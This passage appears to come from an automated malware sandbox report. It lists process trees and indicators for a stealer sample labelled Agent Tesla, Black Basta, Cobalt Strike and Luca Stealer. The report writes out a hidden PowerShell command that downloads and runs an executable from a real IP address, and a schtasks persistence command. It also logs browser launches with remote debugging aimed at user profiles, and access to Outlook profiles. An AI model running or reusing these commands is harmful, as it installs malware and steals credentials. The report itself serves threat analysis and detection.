4420	steamerrorreporter.exe
5984	UZPt0hR.exe
5984	UZPt0hR.exe
5984	UZPt0hR.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1560	chrome.exe
1560	chrome.exe
1560	chrome.exe
1560	chrome.exe
6044	msedge.exe
6044	msedge.exe
6044	msedge.exe
6044	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	2912	ibC8xs1.exe
Token: SeDebugPrivilege	1272	exp.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeDebugPrivilege	2836	DgQBvwg.exe
Token: SeShutdownPrivilege	4580	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4580	msiexec.exe
Token: SeSecurityPrivilege	3152	msiexec.exe
Token: SeCreateTokenPrivilege	4580	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4580	msiexec.exe
Token: SeLockMemoryPrivilege	4580	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4580	msiexec.exe
Token: SeMachineAccountPrivilege	4580	msiexec.exe
Token: SeTcbPrivilege	4580	msiexec.exe
Token: SeSecurityPrivilege	4580	msiexec.exe
Token: SeTakeOwnershipPrivilege	4580	msiexec.exe
Token: SeLoadDriverPrivilege	4580	msiexec.exe
Token: SeSystemProfilePrivilege	4580	msiexec.exe
Token: SeSystemtimePrivilege	4580	msiexec.exe
Token: SeProfSingleProcessPrivilege	4580	msiexec.exe
Token: SeIncBasePriorityPrivilege	4580	msiexec.exe
Token: SeCreatePagefilePrivilege	4580	msiexec.exe
Token: SeCreatePermanentPrivilege	4580	msiexec.exe
Token: SeBackupPrivilege	4580	msiexec.exe
Token: SeRestorePrivilege	4580	msiexec.exe
Token: SeShutdownPrivilege	4580	msiexec.exe
Token: SeDebugPrivilege	4580	msiexec.exe
Token: SeAuditPrivilege	4580	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4580	msiexec.exe
Token: SeChangeNotifyPrivilege	4580	msiexec.exe
Token: SeRemoteShutdownPrivilege	4580	msiexec.exe
Token: SeUndockPrivilege	4580	msiexec.exe
Token: SeSyncAgentPrivilege	4580	msiexec.exe
Token: SeEnableDelegationPrivilege	4580	msiexec.exe
Token: SeManageVolumePrivilege	4580	msiexec.exe
Token: SeImpersonatePrivilege	4580	msiexec.exe
Token: SeCreateGlobalPrivilege	4580	msiexec.exe
Token: SeRestorePrivilege	3152	msiexec.exe
Token: SeTakeOwnershipPrivilege	3152	msiexec.exe
Token: SeRestorePrivilege	3152	msiexec.exe
Token: SeTakeOwnershipPrivilege	3152	msiexec.exe
Token: SeDebugPrivilege	1776	MSBuild.exe
Token: SeRestorePrivilege	3152	msiexec.exe
Token: SeTakeOwnershipPrivilege	3152	msiexec.exe

Suspicious use of FindShellTrayWindow 23 IoCs

pid	Process
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
4500	rundll32.exe
1700	rundll32.exe
1776	MSBuild.exe
1560	chrome.exe
5924	rundll32.exe
6044	msedge.exe
6044	msedge.exe
5380	rundll32.exe
3816	rundll32.exe
440	rundll32.exe
5264	rundll32.exe
1732	rundll32.exe
2888	rundll32.exe
4244	rundll32.exe
1008	rundll32.exe
5724	rundll32.exe
7884	rundll32.exe
6344	rundll32.exe
6824	rundll32.exe
8608	rundll32.exe

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1776	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3736 wrote to memory of 4172	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3736 wrote to memory of 4172	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3736 wrote to memory of 4172	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 3736 wrote to memory of 1508	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3736 wrote to memory of 1508	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3736 wrote to memory of 1508	3736	2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 4172 wrote to memory of 2304	4172	cmd.exe	89
PID 4172 wrote to memory of 2304	4172	cmd.exe	89
PID 4172 wrote to memory of 2304	4172	cmd.exe	89
PID 1508 wrote to memory of 3636	1508	mshta.exe	91
PID 1508 wrote to memory of 3636	1508	mshta.exe	91
PID 1508 wrote to memory of 3636	1508	mshta.exe	91
PID 3636 wrote to memory of 436	3636	powershell.exe	97
PID 3636 wrote to memory of 436	3636	powershell.exe	97
PID 3636 wrote to memory of 436	3636	powershell.exe	97
PID 436 wrote to memory of 848	436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE	100
PID 436 wrote to memory of 848	436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE	100
PID 436 wrote to memory of 848	436	TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE	100
PID 848 wrote to memory of 2912	848	rapes.exe	104
PID 848 wrote to memory of 2912	848	rapes.exe	104
PID 2912 wrote to memory of 3648	2912	ibC8xs1.exe	105
PID 2912 wrote to memory of 3648	2912	ibC8xs1.exe	105
PID 3648 wrote to memory of 1324	3648	csc.exe	107
PID 3648 wrote to memory of 1324	3648	csc.exe	107
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 2912 wrote to memory of 1776	2912	ibC8xs1.exe	108
PID 1892 wrote to memory of 980	1892	cmd.exe	111
PID 1892 wrote to memory of 980	1892	cmd.exe	111
PID 392 wrote to memory of 1272	392	explorer.exe	113
PID 392 wrote to memory of 1272	392	explorer.exe	113
PID 1272 wrote to memory of 1416	1272	exp.exe	115
PID 1272 wrote to memory of 1416	1272	exp.exe	115
PID 1416 wrote to memory of 548	1416	csc.exe	117
PID 1416 wrote to memory of 548	1416	csc.exe	117
PID 1272 wrote to memory of 888	1272	exp.exe	118
PID 1272 wrote to memory of 888	1272	exp.exe	118
PID 1272 wrote to memory of 888	1272	exp.exe	118
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 1272 wrote to memory of 4248	1272	exp.exe	119
PID 848 wrote to memory of 2836	848	rapes.exe	122

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3218366390-1258052702-4267193707-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-07_23573a8db4c1b7f45d67aa96325236dd_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3736
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4172
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn e1Xh5maqfmY /tr "mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2304
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\73ZfHCr0l.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE
      "C:\Users\Admin\AppData\Local\TempJA2DMLA9WJLRYNIYN3BLOV0XRFU33HK4.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:436
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:848
      - C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10480540101\ibC8xs1.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2912
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\um5bn14s\um5bn14s.cmdline"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3648
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDD6.tmp" "c:\Users\Admin\AppData\Local\Temp\um5bn14s\CSCF196E86944004C4E9B2511622423A2F9.TMP"
        8⤵
        
        PID:1324
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Downloads MZ/PE file
        Accesses Microsoft Outlook accounts
        Accesses Microsoft Outlook profiles
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:1776
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:4500
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:1700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:1560
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x104,0x108,0x10c,0x100,0x7c,0x7ff83a95dcf8,0x7ff83a95dd04,0x7ff83a95dd10
        9⤵
        
        PID:4000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1996 /prefetch:2
        9⤵
        
        PID:700
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2248,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2244 /prefetch:3
        9⤵
        
        PID:872
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2384,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:8
        9⤵
        
        PID:1596
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3264,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3260 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:4008
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:1756
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4252 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:1100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,9361191641412909778,2619622656377567075,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4432 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5196
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:6044
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ff83b90f208,0x7ff83b90f214,0x7ff83b90f220
        9⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1988,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:2
        9⤵
        
        PID:5316
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2320,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2316 /prefetch:3
        9⤵
        
        PID:5392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2668,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2664 /prefetch:8
        9⤵
        
        PID:212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3608,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3620,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3604 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4316,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4332,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:2
        9⤵
        Uses browser remote debugging
        
        PID:1416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3744,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3732 /prefetch:8
        9⤵
        
        PID:5272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=5160,i,2724790333369867357,17091601556602995792,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5140 /prefetch:8
        9⤵
        
        PID:5540
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5380
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3816
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:440
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:5264
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:1732
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
